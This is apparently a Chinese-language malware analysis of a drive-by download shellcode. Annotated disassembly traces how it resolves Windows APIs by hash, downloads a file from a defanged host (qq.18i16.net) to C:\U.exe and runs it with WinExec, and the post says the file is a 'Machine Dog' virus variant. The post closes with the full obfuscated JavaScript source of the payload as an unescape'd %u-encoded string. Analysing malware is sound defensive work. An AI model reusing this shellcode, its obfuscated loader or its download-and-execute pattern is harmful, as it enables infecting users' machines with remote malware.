1、shellcode初始化代码

代码:
00401000 > $  8D85 70FEFFFF lea     eax, dword ptr [ebp-190]         ;  shellcode初始化代码
00401006   .  50            push    eax                              ; /pWSAData
00401007   .  68 01010000   push    101                              ; |RequestedVersion = 101 (1.1.)
0040100C   .  FF15 18504000 call    dword ptr [<&Ws2_32.WSAStartup>] ; \WSAStartup
2、获取函数的运算部分
代码:
00401020   .  EB 54         jmp     short 00401076            -------------------
00401022  /$  8B75 3C       mov     esi, dword ptr [ebp+3C]                      |
00401025  |.  8B7435 78     mov     esi, dword ptr [ebp+esi+78]                  |
00401029  |.  03F5          add     esi, ebp                                     |
0040102B  |.  56            push    esi                                          |
0040102C  |.  8B76 20       mov     esi, dword ptr [esi+20]
0040102F  |.  03F5          add     esi, ebp
00401031  |.  33C9          xor     ecx, ecx
00401033  |.  49            dec     ecx
00401034  |>  41            /inc     ecx
00401035  |.  AD            |lods    dword ptr [esi]                   这部分就是获取函数的运算部分
00401036  |.  33DB          |xor     ebx, ebx
00401038  |>  36:0FBE1428   |/movsx   edx, byte ptr ss:[eax+ebp]
0040103D  |.  38F2          ||cmp     dl, dh
0040103F  |.  74 08         ||je      short 00401049
00401041  |.  C1CB 0D       ||ror     ebx, 0D
00401044  |.  03DA          ||add     ebx, edx                                   |
00401046  |.  40            ||inc     eax                                        |
00401047  |.^ EB EF         |\jmp     short 00401038                             |
00401049  |>  3BDF          |cmp     ebx, edi                                    |
0040104B  |.^ 75 E7         \jnz     short 00401034   ----------------------------
3、shellcode运行的整个流程,最终通过hxxp://qq.18i16.net/exe1/lzz.css下载指定的病毒到用户计算机上执行,通过分析,下载

下来的为机器狗的最新变种,美其名曰“牛”。
代码:
00401090   .  8B40 3C       mov     eax, dword ptr [eax+3C]
00401093   >  95            xchg    eax, ebp                         ;  交换
00401094   .  BF 8E4E0EEC   mov     edi, EC0E4E8E                    ;  EDI初始化
00401099   .  E8 84FFFFFF   call    00401022                         ;  获取到kernel32.LoadLibraryA
0040109E   .  83EC 04       sub     esp, 4
004010A1   .  832C24 3C     sub     dword ptr [esp], 3C
004010A5   .  FFD0          call    eax                              ;  执行加载urlmon.dll
004010A7   .  95            xchg    eax, ebp
004010A8   .  50            push    eax
004010A9   .  BF 361A2F70   mov     edi, 702F1A36
004010AE   .  E8 6FFFFFFF   call    00401022                         ;  urlmon.URLDownloadToFileA
004010B3   .  8B5424 FC     mov     edx, dword ptr [esp-4]
004010B7   .  8D52 BA       lea     edx, dword ptr [edx-46]          ;  执行后保存到本地的文件路径和名称 C:\U.exe
004010BA   .  33DB          xor     ebx, ebx
004010BC   .  53            push    ebx
004010BD   .  53            push    ebx
004010BE   .  52            push    edx                              ;  C:\U.exe 压栈
004010BF   .  EB 24         jmp     short 004010E5
004010C1   $  53            push    ebx
004010C2   .  FFD0          call    eax                              ;  hxxp://qq.18i16.net/exe1/lzz.css执行下载
004010C4   .  5D            pop     ebp
004010C5   .  BF 98FE8A0E   mov     edi, 0E8AFE98                    ;  edi初始化
004010CA   .  E8 53FFFFFF   call    00401022                         ;  获取到函数kernel32.WinExec
004010CF   .  83EC 04       sub     esp, 4
004010D2   .  832C24 62     sub     dword ptr [esp], 62
004010D6   .  FFD0          call    eax                              ;  执行
004010D8   .  BF 7ED8E273   mov     edi, 73E2D87E
004010DD   .  E8 40FFFFFF   call    00401022                         ;  获取到函数kernel32.ExitProcess
004010E2   .  52            push    edx
004010E3   .  FFD0          call    eax                              ; shellcode执行完毕退出
004010E5   >  E8 D7FFFFFF   call    004010C1                         ; 获取到函数地址后开始执行动作
源代码:
代码:
var huoqiang=window["unescape"](""+"%u54EB"+"%u758B"+"%u8B3C"+"%u3574"+"%u0378"+"%u56F5"+"%u768B"+"%u0320"+"%

u33F5"+"%u49C9"+"%uAD41"+"%uDB33"+"%u0F36"+"%u14BE"+"%u3828"+"%u74F2"+"%uC108"+"%u0DCB"+"%uDA03"+"%uEB40"+"%

u3BEF"+"%u75DF"+"%u5EE7"+"%u5E8B"+"%u0324"+"%u66DD"+"%u0C8B"+"%u8B4B"+"%u1C5E"+"%uDD03"+"%u048B"+"%u038B"+"%

uC3C5"+"%u7275"+"%u6D6C"+"%u6E6F"+"%u642E"+"%u6C6C"+"%u4300"+"%u5C3A"+"%u2e55"+"%u7865"+"%u0065%uC033"+"%u0364"+"%

u3040"+"%u0C78"+"%u408"+"B"+"%u8B0"+"C"+"%u"+"1C7"+"0%u8BA"+"D"+"%u084"+"0"+"%u09E"+"B%u408"+"B"+"%

u8D3"+"4%"+"u7C4"+"0"+"%u408"+"B"+"%u953C"+"%u8EBF"+"%u0E4E"+"%uE8EC"+"%uFF84%uFFFF"+"%uEC83"+"%u8304"+"%u242C"+"%

uFF3C"+"%u95D0"+"%uBF50"+"%u1A36"+"%u702F"+"%u6FE8"+"%uFFFF"+"%u8BFF"+"%u2454"+"%u8DFC"+"%uBA52"+"%uDB33"+"%

u5353"+"%uEB52"+"%u5324"+"%uD0FF"+"%uBF5D"+"%uFE98"+"%u0E8A"+"%u53E8"+"%uFFFF"+"%u83FF"+"%u04EC"+"%u2C83"+"%

u6224"+"%uD0FF"+"%u7EBF"+"%uE2D8"+"%uE873"+"%uFF40"+"%uFFFF"+"%uFF52"+"%uE8D0"+"%uFFD7"+"%uFFFF"+"%u74"+"6"+"8%

u7074%u2f3a%u712f%u2e71%u3831%u3169%u2e36%u656e%u2f74%u7865"+"%u3165%u6c2f%u7a7a%u632e%u7373%u0000");